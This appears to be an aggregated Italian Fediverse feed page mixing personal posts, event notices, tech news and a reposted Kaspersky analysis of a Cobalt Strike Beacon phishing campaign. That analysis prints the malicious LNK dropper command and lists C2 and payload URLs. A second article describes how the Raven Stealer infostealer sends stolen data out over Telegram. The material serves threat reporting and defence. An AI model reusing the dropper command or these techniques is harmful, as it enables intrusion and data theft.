Salta al contenuto principale



si dice che la storia la facciano i vincitori, ma in realtà la fa chi sopravvive. pensateci prima di dire che il morbillo, il covid, o tutte le malattie non fanno male e sono una invenzione di "big pharma". lo potete dire solo perché i morti non parlano, mentre chi ha avuto fortuna si. solo perché nessuno vi può smentire non significa che abbiate ragione.


Firenze, regalo libri per bambini


@Il Fedimercatino / Flohmarkt /Flohra
@Firenze

Regalo libri per bambini (4-6 anni) a chi se li viene a prendere. Tutti in ottimo stato.

Firenze, zona Ponte a Greve/Casellina.

Rispondetemi sul mio account di poliverso.org altrimenti non è detto che veda il messaggio.



#Presentazione time!

Sono Benedetta (she/her), una neurospicy transfem aspirante pilota di mech, approdo su Friendica per capire quale possa essere la regione del Fediverso più adatta al mio progettino di #selfhosting (al momento sono principalmente su Mastodon).

Il mio mestiere (e passione) sono i disegnetti, sperando prima o poi di riuscire a fare #fumetti e #comics, ma mi piacciono anche gli #rpg sia da tavolo sia #videogame, la #F1 e un sacco di altre robe. Parlerò probabilmente perlopiù di questo, e della mia vita quotidiana se capita.

Al momento ho iniziato una newsletter per provare a dare ordine a quello che faccio e vivo e parlarne, mi piacerebbe riuscire a stabilire un contatto con le persone (e magari portarle sul fediverso).

Free Palestine, trans rights are human rights, antifa sempre, ma insomma queste sono le basi 👀



Alghero: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica”


Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica
Sabato 9 agosto 2025 – ore 21.00 – Alghero (SS)

Dopo la tappa di Quartu Sant’Elena, prosegue ad Alghero l’appuntamento con “Una dose di realtà”, un incontro pubblico dedicato al rapporto tra salute mentale, scienza e politiche sulle terapie psichedeliche.

L’evento si terrà sabato 9 agosto 2025 alle ore 21.00, presso il Ristorante Movida, in Piazza S. Erasmo 9/C, Alghero.
Ingresso gratuito. Seguirà un’apericena di autofinanziamento di euro 24 presso lo stesso ristorante, dalle ore 22:00. Parte del ricavato sarà devoluto ad Associazione Luca Coscioni. Per prenotare l’apericena telefonare al numero 079 974 589


Intervengono:

  • Letizia Renzini – MAPS Italia, curatrice de Il Bosco Fiorito
  • Tania Re – Psicologa clinica, co-autrice de Il Bosco Fiorito e “È la dose che fa’l veleno”
  • Nicola Sportelli – Psichiatra, SIMESPI
  • Avy Candeli – Direttore creativo dell’Associazione Luca Coscioni e PsychedelicCare.eu
  • Claudia Moretti – Avvocata, responsabile psichedelici dell’Associazione Luca Coscioni
  • Caterina Bartoli – Anatomopatologa
  • Elisabetta Caria-Zadeh – Farmacista in California
  • Federico Di VitaIlluminismo Psichedelico

Modera:

  • Giulia Giglio, Cellula Sardegna dell’Associazione Luca Coscioni

Saluti istituzionali:

  • Valdo Di Nolfo, Consigliere Regionale

L’iniziativa è realizzata in collaborazione con la libreria Il Labirinto Mondadori Bookstore e con il patrocinio di:
Associazione Luca Coscioni, Psychedelicare.eu, MAPS Italia, SIMESPI, Quelli da Coscioni Sardegna.

L'articolo Alghero: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica” proviene da Associazione Luca Coscioni.



Iglesias: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica”


Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica
Giovedì 7 agosto 2025 – ore 19.30 – Iglesias (SU)

Il ciclo di incontri pubblici dedicati a salute mentale e terapie psichedeliche fa tappa a Iglesias con l’iniziativa “Una dose di realtà”, un momento di confronto tra esperti, attivisti e istituzioni su scienza, politiche pubbliche e libertà di ricerca.

L’evento si terrà giovedì 7 agosto 2025 alle ore 19.30, presso la Sala Remo Branca del Palazzo Municipale di Iglesias, in Piazza Municipio. Con il patrocinio del Comune di Iglesias. Seguirà alle 21.30 un aperitivo di autofinanziamento, di cui una parte del ricavato sarà devoluta ad Associazione Luca Coscioni, presso il Bar Ex Farmacia, Piazza Pichi 1. La prenotazione è obbligatoria al numero 347 877 6481.


Intervengono:

  • Letizia Renzini – MAPS Italia, curatrice de Il Bosco Fiorito
  • Tania Re – Psicologa clinica, co-autrice de Il Bosco Fiorito e “È la dose che fa’l veleno”
  • Nicola Sportelli – Psichiatra, SIMESPI
  • Avy Candeli – Direttore creativo dell’Associazione Luca Coscioni e PsychedelicCare.eu
  • Claudia Moretti – Avvocata, responsabile psichedelici dell’Associazione Luca Coscioni
  • Caterina Bartoli – Anatomopatologa
  • Elisabetta Caria-Zadeh – Farmacista in California
  • Federico Di VitaIlluminismo Psichedelico

Modera:

  • Carla Mura, Giornalista

Saluti istituzionali a cura dell’Amministrazione comunale di Iglesias

L’iniziativa è promossa da:
Associazione Luca Coscioni, Psychedelicare.eu, MAPS Italia, SIMESPI, Cellula Coscioni Sardegna

L'articolo Iglesias: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica” proviene da Associazione Luca Coscioni.



A Quartu S. Elena: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica”


Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica
Venerdì 8 agosto 2025 – ore 19.30 – Quartu Sant’Elena (CA)

L’appuntamento si terrà venerdì 8 agosto 2025, alle ore 19.30, presso lo Spazio Michelangelo Pira, in via Brigata Sassari 10, Quartu Sant’Elena (CA). Ingresso gratuito. Seguirà alle 21.30 un aperitivo di autofinanziamento presso l’EGO Cafè Bar Lounge, Via Brigata Sassari 25. La prenotazione è obbligatoria al numero 070 204 2710. Parte del ricavato sarà devoluto ad Associazione Luca Coscioni.


Intervengono:

  • Letizia Renzini – MAPS Italia, curatrice de Il Bosco Fiorito
  • Tania Re – Psicologa clinica, co-autrice de Il Bosco Fiorito e “È la dose che fa’l veleno”
  • Nicola Sportelli – Psichiatra, SIMESPI
  • Avy Candeli – Direttore creativo dell’Associazione Luca Coscioni e PsychedelicCare.eu
  • Claudia Moretti – Avvocata, responsabile psichedelici dell’Associazione Luca Coscioni
  • Caterina Bartoli – Anatomopatologa
  • Elisabetta Caria-Zadeh – Farmacista in California
  • Federico Di VitaIlluminismo Psichedelico

Modera:

  • Carla Mura, Giornalista

Saluti istituzionali:

  • Graziano Milia, Sindaco di Quartu Sant’Elena

L’evento è promosso dal Comune di Quartu Sant’Elena, e in collaborazione con: Associazione Luca Coscioni, Psychedelicare.eu, MAPS Italia, SIMESPI, Cellula Coscioni Sardegna.

L'articolo A Quartu S. Elena: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica” proviene da Associazione Luca Coscioni.



Everyone’s Invited to the Copyparty


Setting up a file server can be intimidating to the uninitiated. There are many servers to choose from, and then you need to decide how to install it — Docker? Kubernates? Well, what’s all that then? [9001] has come to the rescue with Copyparty, a full-featured file server in a single Python script.

It’s light enough to run on nearly anything, and getting it running could not be easier: run copyparty-sfx.py, and you’ve got a server. There’s even a 32-bit .exe for older Windows machines — Windows 2000 seems to be the oldest version tested.
Browsers supported: almost all of them.
It’ll connect to anything, both in terms of the variety of protocols supported, and the browsers its web interface loads in. The GitHub documentation says browser support : “Yes”, which is pretty accurate going down the list. Sadly Copyparty’s pages do not work in NACA Mosaic, but IE4 is A-OK.

There’s, FTP, TFTP, HTTP/HTTPS, WebDAV, SMB/CIFS, with unp/zeroconf/mdns/ssdp, etc etc. You need to check the readme for all features, some of which — like transcoding — are only available when dependencies such as ffmpeg installed on the server. Alternatively you can watch the video embedded below to get walked through the features. If the video whets your appetite, can also visit a read-only Copyparty server being demoed on a NUC sitting in [9001]’s basement.

Over the years we’ve seen plenty of folks create personal servers, but the focus is generally on the hardware side of things. While those with more software experience might prefer to configure the various services involved manually, we can definitely see the appeal of a project like Copyparty. In some ways it’s the inverse of the UNIX Philosophy: instead of doing one thing perfectly, this program is doing everything [9001] could think of, and doing it “good enough”.

Thanks to [pedropolis] for inviting us to the Copyparty via the tips line. Building a NAS? Writing software? Hardware?Whatever you do, the tips line is for you.

youtube.com/embed/15_-hgsX2V0?…


hackaday.com/2025/07/30/everyo…



Start-ups in der Rüstungsbranche: „Man kann hier von einem neuen militärisch-industriellen Komplex sprechen“


netzpolitik.org/2025/start-ups…



Perché il Garante pizzica Meta per l’IA su Whatsapp

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
L’Autorità garante della concorrenza e del mercato (Agcm) ha avviato un'istruttoria nei confronti di Meta per presunto abuso di posizione dominante. C'entra la decisione di pre-installare il proprio servizio di intelligenza

reshared this



Cobalt Strike Beacon delivered via GitHub and social media



Introduction


In the latter half of 2024, the Russian IT industry, alongside a number of entities in other countries, experienced a notable cyberattack. The attackers employed a range of malicious techniques to trick security systems and remain undetected. To bypass detection, they delivered information about their payload via profiles on both Russian and international social media platforms, as well as other popular sites supporting user-generated content. The samples we analyzed communicated with GitHub, Microsoft Learn Challenge, Quora, and Russian-language social networks. The attackers thus aimed to conceal their activities and establish a complex execution chain for the long-known and widely used Cobalt Strike Beacon.

Although the campaign was most active during November and December 2024, it continued until April 2025. After a two-month silence, our security solutions began detecting attacks again. The adversary employed new malicious samples, which were only slightly modified versions of those described in the article.

Kaspersky solutions detect this threat and assign the following verdicts:

  • HEUR:Trojan.Win64.Agent.gen
  • HEUR:Trojan.Win64.Kryptik.gen
  • HEUR:Trojan.WinLNK.Starter.gen
  • MEM:Trojan.Multi.Cobalt.gen
  • HEUR:Trojan.Win32.CobaltStrike.gen


Initial attack vector


The initial attack vector involved spear phishing emails with malicious attachments. The emails were disguised as legitimate communications from major state-owned companies, particularly within the oil and gas sector. The attackers feigned interest in the victims’ products and services to create a convincing illusion of legitimacy and increase the likelihood of the recipient opening the malicious attachment.

Sample spear phishing email
Sample spear phishing email

All attachments we observed were RAR archives with the following structure:

  • Требования.lnk
  • Требования
    • Company Profile.pdf
    • List of requirements.pdf
    • Требования
      • pdf
      • pdf



Company profile.pdf and List of requirements.pdf were decoy files designed to complement the information in the email. The directory Требования\Требования contained executables named Company.pdf and Requirements.pdf, designed to mimic secure PDF documents. The directory itself was hidden, invisible to the user by default.

When Требования.lnk was opened, the files in Требования\Требования were copied to %public%\Downloads\ and renamed: Company.pdf became nau.exe, and Requirements.pdf became BugSplatRc64.dll. Immediately afterward, nau.exe was executed.
%cd% /c echo F | xcopy /h /y %cd%\Требования\Требования %public%\Downloads\

& start %cd%\Требования

& ren %public%\Downloads\Company.pdf nau.exe

& ren %public%\Downloads\Requirements.pdf BugSplatRc64.dll

& %public%\Downloads\nau.exe
Contents of Требования.lnk

Требования.lnk execution sequence
Требования.lnk execution sequence

Malicious agent


Process flow diagram for nau.exe
Process flow diagram for nau.exe

In this attack, the adversary leveraged a common technique: DLL Hijacking (T1574.001). To deploy their malicious payload, they exploited the legitimate Crash reporting Send Utility (original filename: BsSndRpt.exe). The tool is part of BugSplat, which helps developers get detailed, real-time crash reports for their applications. This was the utility that the attackers renamed from Company.pdf to nau.exe.

For BsSndRpt.exe to function correctly, it requires BugSplatRc64.dll. The attackers saved their malicious file with that name, forcing the utility to load it instead of the legitimate file.

To further evade detection, the malicious BugSplatRc64.dll library employs Dynamic API Resolution (T1027.007). This technique involves obscuring API functions within the code, resolving them dynamically only during execution. In this specific case, the functions were obfuscated via a custom hashing algorithm, which shares similarities with CRC (Cyclic Redundancy Check).

Hashing algorithm
Hashing algorithm

A significant portion of the hashes within the malicious sample are XOR-encrypted. Additionally, after each call, the address is removed from memory, and API functions are reloaded if a subsequent call is needed.

MessageBoxW function hook


The primary purpose of BugSplatRc64.dll is to intercept API calls within the legitimate utility’s process address space to execute its malicious code (DLL Substitution, T1574.001). Instead of one of the API functions required by the process, a call is made to a function (which we’ll refer to as NewMessageBox) located within the malicious library’s address space. This technique makes it difficult to detect the malware in a sandbox environment, as the library won’t launch without a specific executable file. In most of the samples we’ve found, the MessageBoxW function call is modified, though we’ve also discovered samples that altered other API calls.

Hooking MessageBoxW
Hooking MessageBoxW

After modifying the intercepted function, the library returns control to the legitimate nau.exe process.

NewMessageBox function


Once the hook is in place, whenever MessageBoxW (or another modified function) is called within the legitimate process, NewMessageBox executes. Its primary role is to run a shellcode, which is loaded in two stages.

First, the executable retrieves HTML content from a webpage located at one of the addresses encrypted within the malicious library. In the sample we analyzed, these addresses were techcommunity.microsoft[.]com/… and quora[.]com/profile/Marieforma…. The information found at both locations is identical. The second address serves as a backup if the first one becomes inactive.

NewMessageBox searches the HTML code retrieved from these addresses for a string whose beginning and end match patterns that are defined in the code and consist of mixed-case alphanumeric characters. This technique allows attackers to leverage various popular websites for storing these strings. We’ve found malicious information hidden inside profiles on GitHub, Microsoft Learn Challenge, Q&A websites, and even Russian social media platforms.

Malicious profiles on popular online platforms
Malicious profiles on popular online platforms

While we didn’t find any evidence of the attackers using real people’s social media profiles, as all the accounts were created specifically for this attack, aligning with MITRE ATT&CK technique T1585.001, there’s nothing stopping the threat actor from abusing various mechanisms these platforms provide. For instance, malicious content strings could be posted in comments on legitimate users’ posts.

The extracted payload is a base64-encoded string with XOR-encrypted data. Decrypted, this data reveals the URL raw.githubusercontent[.]com/Ma…, which then downloads another XOR-encrypted shellcode.

We initially expected NewMessageBox to execute the shellcode immediately after decryption. Instead, nau.exe launches a child process with the same name and the qstt parameter, in which all of the above actions are repeated once again, ultimately resulting in the execution of the shellcode.

Shellcode


An analysis of the shellcode (793453624aba82c8e980ca168c60837d) reveals a reflective loader that injects Cobalt Strike Beacon into the process memory and then hands over control to it (T1620).

The observed Cobalt sample communicates with the C2 server at moeodincovo[.]com/divide/mail/SUVVJRQO8QRC.

Attribution and victims


The method used to retrieve the shellcode download address is similar to the C2 acquisition pattern that our fellow security analysts observed in the EastWind campaign. In both cases, the URL is stored in a specially crafted profile on a legitimate online platform like Quora or GitHub. In both instances, it’s also encrypted using an XOR algorithm. Furthermore, the targets of the two campaigns partially overlap: both groups of attackers show interest in Russian IT companies.

It’s worth mentioning that while most of the attacks targeted Russian companies, we also found evidence of the malicious activity in China, Japan, Malaysia, and Peru. The majority of the victims were large and medium-sized businesses.

Takeaways


Threat actors are using increasingly complex and clever methods to conceal long-known tools. The campaign described here used techniques like DLL hijacking, which is gaining popularity among attackers, as well as obfuscating API calls within the malicious library and using legitimate resources like Quora, GitHub, and Microsoft Learn Challenge to host C2 addresses. We recommend that organizations adhere to the following guidelines to stay safe:

  • Track the status of their infrastructure and continuously monitor their perimeter.
  • Use powerful security solutions to detect and block malware embedded within bulk email.
  • Train their staff to increase cybersecurity awareness.
  • Secure corporate devices with a comprehensive system that detects and blocks attacks in the early stages.

You can detect the malware described here by searching for the unsigned file BugSplatRc64.dll in the file system. Another indirect sign of an attack could be the presence of Crash reporting Send Utility with any filename other than the original BsSndRpt.exe.

IOCs:


LNK
30D11958BFD72FB63751E8F8113A9B04
92481228C18C336233D242DA5F73E2D5

Legitimate BugSplat.exe
633F88B60C96F579AF1A71F2D59B4566

DLL
2FF63CACF26ADC536CD177017EA7A369
08FB7BD0BB1785B67166590AD7F99FD2
02876AF791D3593F2729B1FE4F058200
F9E20EB3113901D780D2A973FF539ACE
B2E24E061D0B5BE96BA76233938322E7
15E590E8E6E9E92A18462EF5DFB94298
66B6E4D3B6D1C30741F2167F908AB60D
ADD6B9A83453DB9E8D4E82F5EE46D16C
A02C80AD2BF4BFFBED9A77E9B02410FF
672222D636F5DC51F5D52A6BD800F660
2662D1AE8CF86B0D64E73280DF8C19B3
4948E80172A4245256F8627527D7FA96

URL
hxxps://techcommunity[.]microsoft[.]com/users/kyongread/2573674
hxxps://techcommunity[.]microsoft[.]com/users/mariefast14/2631452
hxxps://raw[.]githubusercontent[.]com/fox7711/repos/main/1202[.]dat
hxxps://my[.]mail[.]ru/mail/nadezhd_1/photo/123
hxxps://learn[.]microsoft[.]com/en-us/collections/ypkmtp5wxwojz2
hxxp://10[.]2[.]115[.]160/aa/shellcode_url[.]html
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2548260
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2631452
hxxps://github[.]com/Mashcheeva
hxxps://my[.]mail[.]ru/mail/veselina9/photo/mARRy
hxxps://github[.]com/Kimoeli
hxxps://www[.]quora[.]com/profile/Marieformach
hxxps://moeodincovo[.]com/divide/mail/SUVVJRQO8QRC


securelist.com/cobalt-strike-a…



A Dual-Screen Cyberdeck To Rule Them All


We like cyberdecks here at Hackaday, and in our time we’ve brought you some pretty amazing builds. But perhaps now we’ve seen the ultimate of the genre, a cyberdeck so perfect in its execution that this will be the machine of choice in the dystopian future, leaving all the others as mere contenders. It comes courtesy of [Sector 07], and it’s a machine to be proud of.

As with many cyberdecks, it uses the Raspberry Pi as its powerhouse. There are a couple of nice touchscreens and a decent keyboard, plus the usual ports and some nice programmable controls. These are none of them out of the ordinary for a cyberdeck, but what really shines with this one is the attention to detail in the mechanical design. Those touchscreens rotate on ball bearings, the hinges are just right, the connections to the Pi have quick release mechanisms, and custom PCBs and ribbon cables make distributing those GPIOs a snap.

On top of all that the aesthetics are on point; this is the machine you want to take into the abandoned mining base with you. Best of all it’s all available from the linked GitHub repository, and you can marvel as we did at the video below the break.

If you hunger for more cyberdecks, this one has some very stiff competition.

youtube.com/embed/cigAxzQGeLg?…

Thanks [Jeremy Geppert] for the tip.


hackaday.com/2025/07/30/a-dual…



Arriva Raven Stealer! Il malware che ruba i tuoi dati utilizzando telegram come “strumento di formazione”


Nel contesto della crescente attività di campagne dannose che utilizzano canali di comunicazione legittimi per aggirare le difese tradizionali, un nuovo strumento ha attirato l’attenzione degli specialisti della sicurezza informatica: Raven Stealer. Questo programma di furto di informazioni è apparso nel luglio 2025 e si è già diffuso tramite Telegram e GitHub, attirando l’attenzione non solo per le sue funzionalità, ma anche per la sua combinazione di furtività, facilità d’uso ed efficacia nel recapitare i dati rubati.

Raven è attualmente oggetto di accese discussioni tra gli analisti delle minacce, in quanto dimostra come gli antivirus e i meccanismi di protezione integrati nei browser possano essere aggirati con mezzi semplici. Raven Stealer è sviluppato in Delphi e C++ e prende di mira i sistemi Windows. Raccoglie dati di accesso, dati di pagamento e compilazioni automatiche dai browser Chromium, inclusi Chrome ed Edge. Il malware viene distribuito tramite il canale Telegram di ZeroTrace sotto forma di “strumento di formazione” e consente anche agli utenti inesperti di avviare furti di dati utilizzando il generatore di build integrato. Telegram viene utilizzato anche come canale per la trasmissione di informazioni rubate, eliminando la necessità di un classico server C2.

Gli assembly vengono compressi tramite UPX per rendere difficile l’analisi ed evitare il rilevamento. Una volta avviato, il malware inietta un modulo crittografato nei processi del browser utilizzando chiamate di sistema come NtWriteVirtualMemory, che gli consentono di bypassare il file system. Password, cookie e dati di pagamento vengono estratti in memoria, bypassando la protezione di crittografia associata all’app.

Inoltre, Raven analizza il sistema alla ricerca di portafogli crittografici, VPN e giochi, e salva tutti i dati in un archivio ZIP con il nome utente. Il trasferimento avviene tramite “curl.exe”, che utilizza l’API di Telegram per scaricare file, inclusi screenshot ed elenchi di testo con informazioni riservate. I metodi implementati in Raven corrispondono a diverse tecniche di MITRE ATT&CK: offuscamento, finestre nascoste, directory harvesting e utilizzo di Telegram come canale di comando. Questa architettura rende lo strumento potente e stealth.

Il team di ZeroTrace supporta il progetto dalla fine di aprile 2025, pubblicando aggiornamenti e codice sorgente su GitHub e Telegram. Il malware è già stato confrontato con un altro dei loro prodotti, Octalyn Stealer, a dimostrazione di una strategia sistematica per la distribuzione di infostealer semplici ma efficaci. Come misure di protezione, gli esperti raccomandano di monitorare i file compressi UPX, i flag di avvio non standard del browser, le chiamate curl e l’accesso alle API di Telegram, nonché di utilizzare l’analisi comportamentale e il monitoraggio delle chiamate di sistema.

Raven Stealer è un’ulteriore dimostrazione di quanto facilmente la tecnologia possa essere trasformata in uno strumento di profitto underground. Sotto le mentite spoglie di uno “strumento di formazione”, si cela un’utilità predatoria che non insegna, ma corrompe, semplificando il percorso verso il crimine e sfumando il confine tra sviluppo e complicità.

L'articolo Arriva Raven Stealer! Il malware che ruba i tuoi dati utilizzando telegram come “strumento di formazione” proviene da il blog della sicurezza informatica.



Giornalisti, contratto fermo dal 2016ma agli editori 240 milioni di finanziamenti


Negli ultimi 9 anni gli stipendi degli italiani sono stati erosi dal 19,3% di inflazione certificata dall’Istat. In questi stessi anni diversi contratti di lavoro nazionali sono stati rinnovati: non quello dei giornalisti, fermo al 2016. Gli editori, però, nel frattempo hanno incassato almeno 240 milioni di euro in aiuti dallo Stato e hanno alleggerito le redazioni (meno 15% di giornalisti regolarmente assunti), aumentando il lavoro precario e sottopagato: un articolo viene retribuito in media 10 euro lordi. Un meccanismo che ha garantito alla stragrande maggioranza degli editori di macinare utili. Da 15 mesi la Federazione nazionale della Stampa italiana si sta confrontando con la Federazione Italiana Editori Giornali per rinnovare il contratto nazionale di lavoro giornalistico, chiedendo aumenti dignitosi per il recupero del potere d’acquisto, investimenti sui giovani, linee guida per governare la trasformazione digitale, a partire dall’intelligenza artificiale, idee e progetti per modernizzare l’editoria italiana con l’obiettivo di alzare la qualità del giornalismo e contrastare la disinformazione e le fake news.

La Costituzione sancisce il diritto di ogni lavoratore a una giusta retribuzione che, per i giornalisti, è anche una garanzia di libertà e per i lettori una certezza di qualità: solo retribuzioni adeguate possono assicurare un lavoro professionale attento e profondo e, quindi, un’informazione certa e a difesa dei cittadini. Tutto questo non sembra interessare agli editori, più concentrati sul taglio dei costi e sul prossimo giro di valzer per chiedere altri soldi al Governo piuttosto che sulle numerose sfide imposte dalla rivoluzione digitale per cercare, insieme ai giornalisti, la strada per superare una crisi devastante. Non hanno voluto confrontarsi sull’uso dell’Ai, sul rapporto coi giganti del web che condizionano sempre di più l’informazione (omologandola), sulle prospettive occupazionali, rimandando a chissà quando ogni discussione. Con un evidente problema: rinviare ancora nel caso dell’editoria significa soccombere, portare il settore a morte certa.

Ma anche quando si è provato a trattare un accordo ponte solo per il rinnovo economico, lo schema si è ripetuto. Il recupero dell’inflazione è la linea di demarcazione di tutto il mondo del lavoro del nostro paese. L’offerta della Fieg, invece, è di gran lunga inferiore rispetto ai rinnovi contrattuali degli altri lavoratori del nostro paese i cui redditi reali sotto l’impulso delle organizzazioni sindacali si sono rafforzati. Non solo: mentre da tempo è in atto una progressiva destrutturazione del Contratto Nazionale di Lavoro, gli editori al tavolo hanno chiesto per i nuovi assunti un nuovo salario d’ingresso al ribasso. Un ulteriore sconto sulle assunzioni obbligatorie per legge in seguito a prepensionamenti (che per gli editori, dal 2022, sono completamente gratuiti) e per questo inaccettabile.

Come giornalisti continueremo a fare il nostro dovere di informare i cittadini con coscienza e impegno, ma siamo anche pronti a mobilitarci per difendere i nostri diritti di lavoratori.


dicorinto.it/associazionismo/g…

Gazzetta del Cadavere reshared this.




“TeleMeloni”: l’ultima fermata


@Giornalismo e disordine informativo
articolo21.org/2025/07/telemel…
Per comprendere “TeleMeloni”, bisogna compiere qualche passo indietro. Non dobbiamo tornare alla RAI dei “Professori” o a quella di Letizia Moratti, esperienze degli anni Novanta che hanno avuto un impatto ma sono ormai lontane nel tempo. E nemmeno possiamo far riferimento alla stagione di

reshared this



I dazi di Trump sono molto più di una questione commerciale. Scrive Caruso

@Notizie dall'Italia e dal mondo

I dazi di Trump non sono semplicemente uno strumento di riequilibrio commerciale. Sono l’arma principale di una strategia geopolitica più ampia che mira a riorganizzare l’intero sistema globale attorno al controllo americano. Nel contesto di quella che molti analisti




Narni Sotterranea
freezonemagazine.com/articoli/…
Di solito, in una intervista, le prime righe vengono spese per presentare il personaggio a cui si rivolgeranno le domande. Col professor Roberto Nini, archeologo, storico, docente universitario, speleologo, Ufficiale al Merito della Repubblica, prima di raccontare la sua incredibile esperienza di vita mi sento di riprendere una sua espressione: “io sono l‘uomo del caso”. […]
L'articolo Narni Sotte
Di solito, in una


Perché il boicottaggio digitale non può funzionare

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
È bizzarra la proposta di boicottaggio digitale che circola in queste ore, come segnale di solidarietà con Gaza (o con Hamas?). L'intervento di Carmen Dal Monte.

startmag.it/innovazione/boicot…

in reply to Informa Pirata

Credo che il concetto principale sia proprio questo:
> il boicottaggio digitale è sintomo di qualcosa di più grave: la totale incomprensione di cosa siano gli algoritmi, di come funzioni il tempo su un pianeta diviso in fusi orari e di quanto complessa sia la realtà storica invocata come bandiera.

reshared this

in reply to Lorenzo Millucci

@Lorenzo Millucci esattamente. Voglio aggiungere comunque che ventilare il sospetto che i "boicottatori" vogliano solidarizzare con Hamas è un'uscita miserabile e schifosa



Oggi, 30 luglio, nel 1945, ottanta anni fa: affondamento dello USS Indianapolis, che trasportava segretamente componenti della prima bomba atomica


L'affondamento dello USS Indianapolis avvenne il 30 luglio 1945, quando l'incrociatore pesante fu silurato da un sottomarino giapponese, l'I-58, nel Mar delle Filippine, durante la Seconda Guerra Mondiale.
La nave, che trasportava in segreto le componenti della prima bomba atomica, "Little Boy", destinata a Hiroshima, fu colpita da due siluri e affondò in circa 12 minuti, senza che l'equipaggio avesse il tempo di lanciare un segnale di soccorso.
Dei 1.196 marinai a bordo, circa 900 sopravvissero all'affondamento, ma molti di loro morirono nei giorni seguenti a causa della disidratazione, della fame, degli attacchi di squali o per aver bevuto acqua salata.
Solo 317 uomini riuscirono a sopravvivere al disastro.

Il comandante dell'incrociatore, il capitano di vascello Charles Butler McVay III, fu accusato di negligenza per non aver "zigzagato" durante la navigazione, rendendo la nave un facile bersaglio, ma le prove a suo favore e la testimonianza del comandante giapponese che aveva affondato la nave non furono sufficienti a salvargli la carriera. McVay fu sottoposto a corte marziale e condannato, ma fu parzialmente scagionato in seguito. Tuttavia, non riuscì a sopportare le pressioni e si suicidò nel 1969.

Il relitto dell'USS Indianapolis fu ritrovato nel 2017 a una profondità di circa 5.500 metri nel Mare delle Filippine, grazie a una spedizione finanziata da Paul Allen, co-fondatore di Microsoft.

La nave, costruita nel 1929, era lunga 186 metri e aveva 9 cannoni da 200 mm.

La sua missione era così segreta che nessuno conosceva la sua posizione, e i soccorsi arrivarono tardi per la maggior parte dei sopravvissuti.

La storia dell'USS Indianapolis è stata raccontata in un film del 2016, "USS Indianapolis: Men of Courage", con Nicolas Cage, che ha ricevuto recensioni generalmente negative. Guarda il trailer qui youtu.be/watch?v=TuoNvPPnr2o

!Storia

in reply to storiaweb

L'immagine è divisa in due sezioni. A sinistra, c'è una fotografia in bianco e nero di un grande vascello da guerra, presumibilmente l'USS Indianapolis, che naviga in mare con un cielo nuvoloso sullo sfondo. A destra, c'è un poster del film "USS Indianapolis: Men of Courage" con Nicolas Cage in primo piano, indossando un'uniforme da marinaio. Il poster mostra anche altri personaggi in uniforme e un'immagine di un'esplosione sul mare, con sommergibili visibili. Il titolo del film è in grande evidenza, con il nome di Nicolas Cage in alto.

Fornito da @altbot, generato localmente e privatamente utilizzando Ovis2-8B

🌱 Energia utilizzata: 0.165 Wh



58 ex ambasciatori UE scrivono a Bruxelles per chiedere di fermare Israele
Cinquantotto ex ambasciatori dell’UE hanno inviato una lettera aperta ai vertici di Bruxelles per condannare l’operato di Israele in Palestina. Nello specifico, denunciano un «trasferimento forzato della popolazione, un grave crimine di guerra» e «passi calcolati verso una pulizia etnica». L’UE, accusano, ha mantenuto «silenzio e neutralità di fronte al genocidio». Chiedono lo stop immediato alle forniture militari, la sospensione degli accordi con Israele e il riconoscimento dello Stato di Palestina. Anche a seguito della lettera, la Commissione starebbe valutando la sospensione parziale dell’accesso di Israele ai fondi Horizon per la ricerca scientifica.


L'indipendente





The Plaintiff claims Tea harmed her and ‘thousands of other similarity situated persons in the massive and preventable cyberattack.’#News
#News



The Sig Sauer P320 has a reputation for firing without pulling the trigger. The manufacturer says that's impossible, but the firearms community is showing the truth is more complicated.

The Sig Sauer P320 has a reputation for firing without pulling the trigger. The manufacturer says thatx27;s impossible, but the firearms community is showing the truth is more complicated.#News

#News #x27




#Ucraina, il gioco degli ultimatum


altrenotizie.org/primo-piano/1…




“If visibility of r/IsraelCrimes is being restricted under the Online Safety Act, it’s only because the state fears accountability,” moderators say.#News
#News


404 Media first contacted Tea about the security issue on Saturday. The company disabled direct messages on Monday after our report.#News
#News


"This is more representative of the developer environment that our future employees will work in."#Meta #AI #wired


Meta Is Going to Let Job Candidates Use AI During Coding Tests


This article was produced with support from WIRED.

Meta told employees that it is going to allow some coding job candidates to use an AI assistant during the interview process, according to internal Meta communications seen by 404 Media. The company has also asked existing employees to volunteer for a “mock AI-enabled interview,” the messages say.

It’s the latest indication that Silicon Valley giants are pushing software engineers to use AI in their jobs, and signals a broader move toward hiring employees who can vibe code as part of their jobs.

“AI-Enabled Interviews—Call for Mock Candidates,” a post from earlier this month on an internal Meta message board reads. “Meta is developing a new type of coding interview in which candidates have access to an AI assistant. This is more representative of the developer environment that our future employees will work in, and also makes LLM-based cheating less effective.”

“We need mock candidates,” the post continues. “If you would like to experience a mock AI-enabled interview, please sign up in this sheet. The questions are still in development; data from you will help shape the future of interviewing at Meta.”

Meta CEO Mark Zuckerberg has made clear at numerous all-hands and in public podcast interviews that he is not just pushing the company’s software engineers towards using AI in their work, but that he foresees human beings managing “AI coding agents” that will write code for the company.

“I think this year, probably in 2025, we at Meta as well as the other companies that are basically working on this, are going to have an AI that can effectively be a midlevel engineer that you have at your company that can write code,” Zuckerberg told Joe Rogan in January. “Over time we’ll get to a point where a lot of the code in our apps and including the AI that we generate is actually going to be built by AI engineers instead of people engineers […] in the future people are going to be so much more creative and they’re going to be freed up to do kind of crazy things.”

